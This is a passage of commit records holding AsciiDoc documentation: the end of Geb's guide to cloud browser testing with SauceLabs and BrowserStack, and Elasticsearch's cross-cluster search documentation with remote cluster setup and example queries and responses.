`allBrowserStackTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n","old_contents":"= Cloud browser testing\n\nWhen you want to perform web testing on multiple browsers and operating systems, it can be quite complicated to maintain machines for each of the target environments.\nThere are a few companies that provide \"remote web browsers as a service\", making it easy to do this sort of matrix testing without having to maintain the multiple browser installations yourself.\nGeb provides easy integration with two such services, link:https:\/\/saucelabs.com\/[SauceLabs] and link:http:\/\/www.browserstack.com\/[BrowserStack].\nThis integration includes two parts: assistance with creating a driver in `GebConfig.groovy` and a Gradle plugin.\n\n== Creating a driver\n\nFor both SauceLabs and BrowserStack, a special driver factory is provided that, given a browser specification as well as an username and access key, creates an instance of `RemoteWebDriver` configured\nto use a browser in the cloud.\nExamples of typical usage in `GebConfig.groovy` are included below.\nThey will configure Geb to run in SauceLabs\/BrowserStack if the appropriate system property is set, and if not it will use whatever driver that is configured.\nThis is useful if you want to run the code in a local browser for development.\nIn theory you could use any system property to pass the browser specification but `geb.saucelabs.browser`\/`geb.browserstack.browser` are also used by the Geb Gradle plugins, so it's a good idea to\nstick with those property names.\n\nThe first parameter passed to the `create()` method is a \u201dbrowser specification\u201c and it should be a list of required browser capabilities in Java properties file format:\n\n----\nbrowserName=\u00abbrowser name as per values of fields in org.openqa.selenium.remote.BrowserType\u00bb\nplatform=\u00abplatform as per enum item names in org.openqa.selenium.Platform\u00bb\nversion=\u00abversion\u00bb\n----\n\nAssuming you're using the following snippet in your `GebConfig.groovy` to execute your code via SauceLabs with Firefox 19 on Linux, you would set the `geb.saucelabs.browser` system property to:\n\n----\nbrowserName=firefox\nplatform=LINUX\nversion=19\n----\n\nand to execute it with IE 9 on Vista to:\n\n----\nbrowserName=internet explorer\nplatform=VISTA\nversion=9\n----\n\nSome browsers like Chrome automatically update to the latest version; for these browsers you don't need to specify the version as there's only one, and you would use something like:\n\n----\nbrowserName=chrome\nplatform=MAC\n----\n\nas the \u201dbrowser specification\u201c. 
For a full list of available browsers, versions and operating systems refer to your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/platforms\/webdriver[SauceLabs platform list]\n* link:http:\/\/www.browserstack.com\/list-of-browsers-and-platforms?product=automate[BrowserStack Browsers and Platforms list]\n\nPlease note that Geb Gradle plugins can set the `geb.saucelabs.browser`\/`geb.browserstack.browser` system properties for you using the aforementioned format.\n\nFollowing the browser specification are the username and access key used to identify your account with the cloud provider.\nThe example uses two environment variables to access this information.\nThis is usually the easiest way of passing something secret to your build in open CI services like link:https:\/\/drone.io\/[drone.io] or link:https:\/\/travis-ci.org\/[Travis CI] if your code is public, but you can\nuse other mechanisms if desired.\n\nYou can optionally pass additional configuration settings by providing a Map to the `create()` method as the last parameter.\nThe configuration options available are described in your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/additional-config[SauceLabs additional config]\n* link:http:\/\/www.browserstack.com\/automate\/capabilities[BrowserStack Capabilities]\n\nFinally, there is also link:api\/geb\/driver\/CloudDriverFactory.html#create(java.lang.String,%20java.lang.String,%20Map%3CString,%20Object%3E)[an overloaded version of `create()` method] available that\ndoesn't take a string specification and allows you to simply specify all the required capabilities using a map.\nThis method might be useful if you just want to use the factory, but don't need the build level parametrization.\n\n[[sauce-labs-driver-factory]]\n=== `SauceLabsDriverFactory`\n\nThe following is an example of utilizing `SauceLabsDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the SauceLabs cloud.\n\n[source,groovy]\n----\ndef sauceLabsBrowser = System.getProperty(\"geb.saucelabs.browser\")\nif (sauceLabsBrowser) {\n driver = {\n def username = System.getenv(\"GEB_SAUCE_LABS_USER\")\n assert username\n def accessKey = System.getenv(\"GEB_SAUCE_LABS_ACCESS_PASSWORD\")\n assert accessKey\n new SauceLabsDriverFactory().create(sauceLabsBrowser, username, accessKey)\n }\n}\n----\n\n[[browser-stack-driver-factory]]\n=== `BrowserStackDriverFactory`\n\nThe following is an example of utilizing `BrowserStackDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the BrowserStack cloud.\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey)\n }\n}\n----\n\nIf using `localIdentifier` support:\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n def localId = System.getenv(\"GEB_BROWSERSTACK_LOCALID\")\n assert localId\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey, localId)\n 
}\n}\n----\n\n== Gradle plugins\n\nFor both SauceLabs and BrowserStack, Geb provides a Gradle plugin which simplifies declaring the account and browsers that are desired, as well as configuring a tunnel to allow the cloud provider to\naccess local applications.\nThese plugins allow easily creating multiple `Test` tasks that will have the appropriate `geb.PROVIDER.browser` property set (where _PROVIDER_ is either `saucelabs` or `browserstack`).\nThe value of that property can be then passed in configuration file to <<sauce-labs-driver-factory>>\/<<browser-stack-driver-factory>> as the \u201dbrowser specification\u201c.\nExamples of typical usage are included below.\n\n=== geb-saucelabs plugin\n\nFollowing is an example of using the geb-saucelabs Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.saucelabs.SauceAccount\n\napply plugin: \"geb-saucelabs\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nrepositories { \/\/<3>\n maven { url \"http:\/\/repository-saucelabs.forge.cloudbees.com\/release\" }\n}\n\ndependencies { \/\/<4>\n sauceConnect \"com.saucelabs:ci-sauce:1.81\"\n}\n\nsauceLabs {\n browsers { \/\/<5>\n firefox_linux_19\n chrome_mac\n delegate.\"internet explorer_vista_9\"\n nexus4 { \/\/<6>\n capabilities(\n browserName: \"android\",\n platform: \"Linux\",\n version: \"4.4\",\n deviceName: \"LG Nexus 4\"\n )\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(SauceAccount.USER_ENV_VAR)\n accessKey = System.getenv(SauceAccount.ACCESS_KEY_ENV_VAR)\n }\n connect { \/\/<9>\n port = 4444 \/\/<10>\n additionalOptions = ['--proxy', 'proxy.example.com:8080'] \/\/<11>\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Declare a repository for resolving SauceConnect.\n<4> Declare version of SauceConnect to be used as part of the `sauceConnect` configuration. 
This will be used by tasks that open a {sauce-connect} tunnel before\nrunning the generated test tasks which means that the browsers in the cloud will have localhost pointing at the machine running the build.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for {sauce-connect}.\n<9> Additionally configure {sauce-connect} if desired.\n<10> Override the port used by SauceConnect, defaults to 4445.\n<11> Pass additional link:https:\/\/docs.saucelabs.com\/reference\/sauce-connect\/#command-line-options[command line options] to SauceConnect.\n\n[TIP]\n====\nYou can use `allSauceLabsTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n\n=== geb-browserstack\n\nFollowing is an example of using the geb-browserstack Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.browserstack.BrowserStackAccount\n\napply plugin: \"geb-browserstack\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nbrowserStack {\n application 'http:\/\/localhost:8080' \/\/<3>\n forceLocal = true \/\/<4>\n browsers { \/\/<5>\n firefox_mac_19\n chrome_mac\n delegate.\"internet explorer_windows_9\"\n nexus4 { \/\/<6>\n capabilities browserName: \"android\", platform: \"ANDROID\", device: \"Google Nexus 4\"\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(BrowserStackAccount.USER_ENV_VAR)\n accessKey = System.getenv(BrowserStackAccount.ACCESS_KEY_ENV_VAR)\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Specify which urls the BrowserStack Tunnel should be able to access.\nMultiple applications can be specified.\nIf no applications are specified, the tunnel will not be restricted to particular URLs.\n<4> Configure BrowserStack tunnel to route all traffic via the local machine.\nThis configuration property controls the `-forcelocal` flag and the default value for it is `false`.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for BrowserStack.\n\n[TIP]\n====\nYou can use `allBrowserStackTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"841d961b584a7cab97c724aa669ba5261a2242c7","subject":"[DOCS] Document CCS-supported APIs 
(#52708)","message":"[DOCS] Document CCS-supported APIs (#52708)\n\nExplicitly notes the Elasticsearch API endpoints that support CCS.\r\n\r\nThis should deter users from attempting to use CCS with other API\r\nendpoints, such as `GET <index>\/_doc\/<_id>`.","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_contents":"[chapter]\n[[modules-cross-cluster-search]]\n= Search across clusters\n\n*{ccs-cap}* lets you run a single search request against one or more\n<<modules-remote-clusters,remote clusters>>. For example, you can use a {ccs} to\nfilter and analyze log data stored on clusters in different data centers.\n\nIMPORTANT: {ccs-cap} requires <<modules-remote-clusters, remote clusters>>.\n\n[float]\n[[ccs-supported-apis]]\n== Supported APIs\n\nThe following APIs support {ccs}:\n\n* <<search-search,Search>>\n* <<search-multi-search,Multi search>>\n* <<search-template,Search template>>\n* <<multi-search-template,Multi search template>>\n\n[float]\n[[ccs-example]]\n== {ccs-cap} examples\n\n[float]\n[[ccs-remote-cluster-setup]]\n=== Remote cluster setup\n\nTo perform a {ccs}, you must have at least one remote cluster configured.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nadds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster\": {\n \"remote\": {\n \"cluster_one\": {\n \"seeds\": [\n \"127.0.0.1:9300\"\n ]\n },\n \"cluster_two\": {\n \"seeds\": [\n \"127.0.0.1:9301\"\n ]\n },\n \"cluster_three\": {\n \"seeds\": [\n \"127.0.0.1:9302\"\n ]\n }\n }\n }\n }\n}\n--------------------------------\n\/\/ TEST[setup:host]\n\/\/ TEST[s\/127.0.0.1:930\\d+\/\\${transport_host}\/]\n\n[float]\n[[ccs-search-remote-cluster]]\n=== Search a single remote cluster\n\nThe following <<search-search,search>> API request searches the\n`twitter` index on a single remote cluster, `cluster_one`.\n\n[source,console]\n--------------------------------------------------\nGET \/cluster_one:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\/\/ TEST[setup:twitter]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n 
\"total\": 1,\n \"successful\": 1,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"cluster_one:twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\n<1> The search response body includes the name of the remote cluster in the\n`_index` parameter.\n\n[float]\n[[ccs-search-multi-remote-cluster]]\n=== Search multiple remote clusters\n\nThe following <<search,search>> API request searches the `twitter` index on\nthree clusters:\n\n* Your local cluster\n* Two remote clusters, `cluster_one` and `cluster_two`\n\n[source,console]\n--------------------------------------------------\nGET \/twitter,cluster_one:twitter,cluster_two:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"num_reduce_phases\": 4,\n \"_shards\": {\n \"total\": 3,\n \"successful\": 3,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 3,\n \"successful\": 3,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 3,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 2,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_one:twitter\", <2>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_two:twitter\", <3>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 2\/\"_score\": \"$body.hits.hits.1._score\"\/]\n\n<1> This document's `_index` parameter doesn't include a cluster name. 
This\nmeans the document came from the local cluster.\n<2> This document came from `cluster_one`.\n<3> This document came from `cluster_two`.\n\n[float]\n[[skip-unavailable-clusters]]\n== Skip unavailable clusters\n\nBy default, a {ccs} returns an error if *any* cluster in the request is\nunavailable.\n\nTo skip an unavailable cluster during a {ccs}, set the\n<<skip-unavailable,`skip_unavailable`>> cluster setting to `true`.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nchanges `cluster_two`'s `skip_unavailable` setting to `true`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster.remote.cluster_two.skip_unavailable\": true\n }\n}\n--------------------------------\n\/\/ TEST[continued]\n\nIf `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't\ninclude matching documents from that cluster in the final results.\n\n[discrete]\n[[ccs-works]]\n== How {ccs} works\n\ninclude::.\/remote-clusters.asciidoc[tag=how-remote-clusters-work]\n\n[discrete]\n[[ccs-gateway-seed-nodes]]\n=== Selecting gateway and seed nodes\n\nGateway and seed nodes need to be accessible from the local cluster via your\nnetwork.\n\nBy default, any master-ineligible node can act as a gateway node. If wanted,\nyou can define the gateway nodes for a cluster by setting\n`cluster.remote.node.attr.gateway` to `true`.\n\nFor {ccs}, we recommend you use gateway nodes that are capable of serving as\n<<coordinating-node,coordinating nodes>> for search requests. If\nwanted, the seed nodes for a cluster can be a subset of these gateway nodes.\n\n[discrete]\n[[ccs-network-delays]]\n=== How {ccs} handles network delays\n\nBecause {ccs} involves sending requests to remote clusters, any network delays\ncan impact search speed. To avoid slow searches, {ccs} offers two options for\nhandling network delays:\n\n<<ccs-min-roundtrips,Minimize network roundtrips>>::\nBy default, {es} reduces the number of network roundtrips between remote\nclusters. This reduces the impact of network delays on search speed. However,\n{es} can't reduce network roundtrips for large search requests, such as those\nincluding a <<request-body-search-scroll, scroll>> or\n<<request-body-search-inner-hits,inner hits>>.\n+\nSee <<ccs-min-roundtrips>> to learn how this option works.\n\n<<ccs-unmin-roundtrips, Don't minimize network roundtrips>>:: For search\nrequests that include a scroll or inner hits, {es} sends multiple outgoing and\nincoming requests to each remote cluster. You can also choose this option by\nsetting the <<ccs-minimize-roundtrips,`ccs_minimize_roundtrips`>> parameter to\n`false`. While typically slower, this approach may work well for networks with\nlow latency.\n+\nSee <<ccs-unmin-roundtrips>> to learn how this option works.\n\n[float]\n[[ccs-min-roundtrips]]\n==== Minimize network roundtrips\n\nHere's how {ccs} works when you minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a single search request to each cluster, including\nthe local cluster. Each cluster performs the search request independently,\napplying its own cluster-level settings to the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. 
Each remote cluster sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n\n[float]\n[[ccs-unmin-roundtrips]]\n==== Don't minimize network roundtrips\n\nHere's how {ccs} works when you don't minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a <<search-shards,search shards>> API request to\neach remote cluster.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its response back to the coordinating node.\nThis response contains information about the indices and shards the {ccs}\nrequest will be executed on.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. The coordinating node sends a search request to each shard, including those in\nits own cluster. Each shard performs the search request independently.\n+\n[WARNING]\n====\nWhen network roundtrips aren't minimized, the search is executed as if all data\nwere in the coordinating node's cluster. We recommend updating cluster-level\nsettings that limit searches, such as `action.search.shard_count.limit`,\n`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for\nthis. If these limits are too low, the search may be rejected.\n====\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-search.svg[]\n\n. Each shard sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n","old_contents":"[chapter]\n[[modules-cross-cluster-search]]\n= Search across clusters\n\n*{ccs-cap}* lets you run a single search request against one or more\n<<modules-remote-clusters,remote clusters>>. 
For example, you can use a {ccs} to\nfilter and analyze log data stored on clusters in different data centers.\n\nIMPORTANT: {ccs-cap} requires <<modules-remote-clusters, remote clusters>>.\n\n[float]\n[[ccs-example]]\n== {ccs-cap} examples\n\n[float]\n[[ccs-remote-cluster-setup]]\n=== Remote cluster setup\n\nTo perform a {ccs}, you must have at least one remote cluster configured.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nadds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster\": {\n \"remote\": {\n \"cluster_one\": {\n \"seeds\": [\n \"127.0.0.1:9300\"\n ]\n },\n \"cluster_two\": {\n \"seeds\": [\n \"127.0.0.1:9301\"\n ]\n },\n \"cluster_three\": {\n \"seeds\": [\n \"127.0.0.1:9302\"\n ]\n }\n }\n }\n }\n}\n--------------------------------\n\/\/ TEST[setup:host]\n\/\/ TEST[s\/127.0.0.1:930\\d+\/\\${transport_host}\/]\n\n[float]\n[[ccs-search-remote-cluster]]\n=== Search a single remote cluster\n\nThe following <<search,search>> API request searches the\n`twitter` index on a single remote cluster, `cluster_one`.\n\n[source,console]\n--------------------------------------------------\nGET \/cluster_one:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\/\/ TEST[setup:twitter]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 1,\n \"successful\": 1,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"cluster_one:twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\n<1> The search response body includes the name of the remote cluster in the\n`_index` parameter.\n\n[float]\n[[ccs-search-multi-remote-cluster]]\n=== Search multiple remote clusters\n\nThe following <<search,search>> API request searches the `twitter` index on\nthree clusters:\n\n* Your local cluster\n* Two remote clusters, `cluster_one` and `cluster_two`\n\n[source,console]\n--------------------------------------------------\nGET \/twitter,cluster_one:twitter,cluster_two:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"num_reduce_phases\": 4,\n \"_shards\": {\n \"total\": 3,\n \"successful\": 3,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 3,\n \"successful\": 3,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 3,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": 
[\n {\n \"_index\": \"twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 2,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_one:twitter\", <2>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_two:twitter\", <3>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 2\/\"_score\": \"$body.hits.hits.1._score\"\/]\n\n<1> This document's `_index` parameter doesn't include a cluster name. This\nmeans the document came from the local cluster.\n<2> This document came from `cluster_one`.\n<3> This document came from `cluster_two`.\n\n[float]\n[[skip-unavailable-clusters]]\n== Skip unavailable clusters\n\nBy default, a {ccs} returns an error if *any* cluster in the request is\nunavailable.\n\nTo skip an unavailable cluster during a {ccs}, set the\n<<skip-unavailable,`skip_unavailable`>> cluster setting to `true`.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nchanges `cluster_two`'s `skip_unavailable` setting to `true`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster.remote.cluster_two.skip_unavailable\": true\n }\n}\n--------------------------------\n\/\/ TEST[continued]\n\nIf `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't\ninclude matching documents from that cluster in the final results.\n\n[discrete]\n[[ccs-works]]\n== How {ccs} works\n\ninclude::.\/remote-clusters.asciidoc[tag=how-remote-clusters-work]\n\n[discrete]\n[[ccs-gateway-seed-nodes]]\n=== Selecting gateway and seed nodes\n\nGateway and seed nodes need to be accessible from the local cluster via your\nnetwork.\n\nBy default, any master-ineligible node can act as a gateway node. If wanted,\nyou can define the gateway nodes for a cluster by setting\n`cluster.remote.node.attr.gateway` to `true`.\n\nFor {ccs}, we recommend you use gateway nodes that are capable of serving as\n<<coordinating-node,coordinating nodes>> for search requests. If\nwanted, the seed nodes for a cluster can be a subset of these gateway nodes.\n\n[discrete]\n[[ccs-network-delays]]\n=== How {ccs} handles network delays\n\nBecause {ccs} involves sending requests to remote clusters, any network delays\ncan impact search speed. To avoid slow searches, {ccs} offers two options for\nhandling network delays:\n\n<<ccs-min-roundtrips,Minimize network roundtrips>>::\nBy default, {es} reduces the number of network roundtrips between remote\nclusters. This reduces the impact of network delays on search speed. 
However,\n{es} can't reduce network roundtrips for large search requests, such as those\nincluding a <<request-body-search-scroll, scroll>> or\n<<request-body-search-inner-hits,inner hits>>.\n+\nSee <<ccs-min-roundtrips>> to learn how this option works.\n\n<<ccs-unmin-roundtrips, Don't minimize network roundtrips>>::\nFor search requests that include a scroll or inner hits, {es} sends multiple\noutgoing and ingoing requests to each remote cluster. You can also choose this\noption by setting the <<search,search>> API's\n<<ccs-minimize-roundtrips,`ccs_minimize_roundtrips`>> parameter to `false`.\nWhile typically slower, this approach may work well for networks with low\nlatency.\n+\nSee <<ccs-unmin-roundtrips>> to learn how this option works.\n\n[float]\n[[ccs-min-roundtrips]]\n==== Minimize network roundtrips\n\nHere's how {ccs} works when you minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a single search request to each cluster, including\nthe local cluster. Each cluster performs the search request independently,\napplying its own cluster-level settings to the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n\n[float]\n[[ccs-unmin-roundtrips]]\n==== Don't minimize network roundtrips\n\nHere's how {ccs} works when you don't minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a <<search-shards,search shards>> API request to\neach remote cluster.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its response back to the coordinating node.\nThis response contains information about the indices and shards the {ccs}\nrequest will be executed 